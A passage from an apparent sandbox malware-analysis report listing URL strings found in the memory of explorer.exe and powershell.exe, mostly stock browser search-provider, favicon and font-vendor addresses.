Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000018.00000002.858800178.000001D7ABEC1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001E.00000002.911636263.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
